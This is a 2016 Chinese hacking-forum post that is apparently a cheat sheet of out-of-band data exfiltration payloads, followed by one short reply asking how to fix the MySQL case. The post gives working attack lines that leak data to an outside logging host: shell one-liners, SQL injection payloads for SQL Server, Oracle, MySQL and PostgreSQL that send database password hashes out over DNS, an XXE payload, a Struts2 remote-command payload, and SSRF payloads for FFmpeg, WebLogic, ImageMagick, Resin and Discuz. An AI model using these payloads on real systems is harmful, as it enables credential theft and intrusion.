搜索
查看: 963|回复: 1

远程服务器获取数据库回显数据

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-6-18 17:16:03 | 显示全部楼层 |阅读模式
本帖最后由 Jumbo 于 2016-6-18 17:19 编辑

0x00 Command Executioni. *nix:
  1. curl http://ip.port.b182oj.ceye.io/`whoami`
复制代码
ii. windows
  1. ping %USERNAME%.b182oj.ceye.io
复制代码
0x01 sql Injectioni. SQL Server
  1. DECLARE @host varchar(1024);
  2. SELECT @host=(SELECT TOP 1
  3. master.dbo.fn_varbintohexstr(password_hash)
  4. FROM sys.sql_logins WHERE name='sa')
  5. +'.ip.port.b182oj.ceye.io';
  6. EXEC('master..xp_dirtree
  7. "\\'+@host+'\foobar$"');
复制代码
ii. Oracle
  1. SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
  2. SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
  3. SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
  4. SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
  5. SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
复制代码
iii. MySQL
  1. SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
复制代码
iv. PostgreSQL
  1. DROP TABLE IF EXISTS table_output;
  2. CREATE TABLE table_output(content text);
  3. CREATE OR REPLACE FUNCTION temp_function()
  4. RETURNS VOID AS $
  5. DECLARE exec_cmd TEXT;
  6. DECLARE query_result TEXT;
  7. BEGIN
  8. SELECT INTO query_result (SELECT passwd
  9. FROM pg_shadow WHERE usename='postgres');
  10. exec_cmd := E'COPY table_output(content)
  11. FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
  12. EXECUTE exec_cmd;
  13. END;
  14. $ LANGUAGE plpgsql SECURITY DEFINER;
  15. SELECT temp_function();
复制代码
0x02 XML Entity Injection
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE root [
  3. <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
  4. %remote;]>
  5. <root/>
复制代码
0x03 Othersi. Struts2
  1. xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}

  2. xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
复制代码
ii. FFMpeg
  1. #EXTM3U
  2. #EXT-X-MEDIA-SEQUENCE:0
  3. #EXTINF:10.0,
  4. concat:http://ip.port.b182oj.ceye.io
  5. #EXT-X-ENDLIST
复制代码
iii. Weblogic
  1. xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
复制代码

iv. ImageMagick
  1. push graphic-context
  2. viewbox 0 0 640 480
  3. fill 'url(http://ip.port.b182oj.ceye.io)'
  4. pop graphic-context
复制代码
v. Resin
  1. xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
复制代码
vi. Discuz
  1. http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
复制代码


您可以更新记录, 让好友们知道您在做什么...

0

主题

8

帖子

106

积分

我是新手

Rank: 1

积分
106
发表于 2016-6-20 09:18:39 | 显示全部楼层
好大上,例如mysql的该怎么补呢
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表